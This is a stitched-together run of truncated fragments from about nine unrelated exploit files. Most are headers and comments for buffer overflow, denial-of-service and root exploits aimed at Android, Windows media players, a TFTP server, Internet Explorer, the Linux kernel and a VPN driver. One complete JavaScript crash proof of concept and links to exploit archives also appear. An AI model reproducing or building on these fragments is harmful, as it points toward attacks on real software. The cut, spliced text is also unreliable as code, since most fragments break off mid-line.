1* Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. orig: http://zenthought.org/content/file/android-root-2009-08-16-source back: http://milw0rm.com/sploits/android-root-20090816.tar.gz
#!/usr/bin/env python # # VUPlayer =2.49 .M3u Universal buffer overflow exploit # Author: mr_me # Download: http://vuplayer.com/ # Tested on Wind0ws XP SP3 and Vist@ # # Thanks to my brother raWjaW --- RESPECT! :) # # What do we see at crash time? ;
#!/usr/bin/python #ProSysInfo TFTP Server TFTPDWIN 0.4.2 #Coded by Wraith import os import sys import struct import socket import time print nProSysInfo TFTP Server TFTPDWIN 0.4.2 print Note: This vuln is sensitive to different buffer lengthn if l
# Playlistmaker version 1.51 # Tested on Windows XP SP2 (English) # Exploit originally discovered by ThE g0bL!N/exploited by germaya_x # I could not get germaya_x's exploit to work with XP3. # The only useable p/p/r I could find was in oledlg.dll #
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # Xenorate Media Player 2.6.0.0(.xpl)Universal Local Buffer Exploit (SEH) # http://www.softpedia.com/progDownload/Xenorate-Download-71701.html ####################################################
html head title Irfan Asrar/title /head body onload=c() Set Attribute Crash : Tested with IE7 Vista IE6 XP2 IE6 XP3 script type=text/javascript function c() { var li = document.createElement(li); li.setAttribute(value, 1); li.value = 1; } /script /b
/*0day HTML Email Creator Sender v2.3 Local Buffer Overflow(Seh) Poc ******************************************************************** Debugging info Seh handler is overwriten , the offset is at 60 bytes in our buffer so you have to build your bu
/* * cfg80211-remote-dos.c * * Linux Kernel 2.6.30.5 cfg80211 Remote DoS * Jon Oberheide jon@oberheide.org * http://jon.oberheide.org * * Information: * * http://patchwork.kernel.org/patch/41218/ * * These pointers can be NULL, the is_mesh() case is
Original Advisory Link: https://www.evilfingers.com/advisory/Advisory/TheGreenBow_VPN_Client_tgbvpn.sys_DoS.php ++++++++++++++++++++++++++++++++++++++++++++++++++++-----------[TheGreenBow VPN Client tgbvpn.sys DoS and Potential LocalPrivilege Escala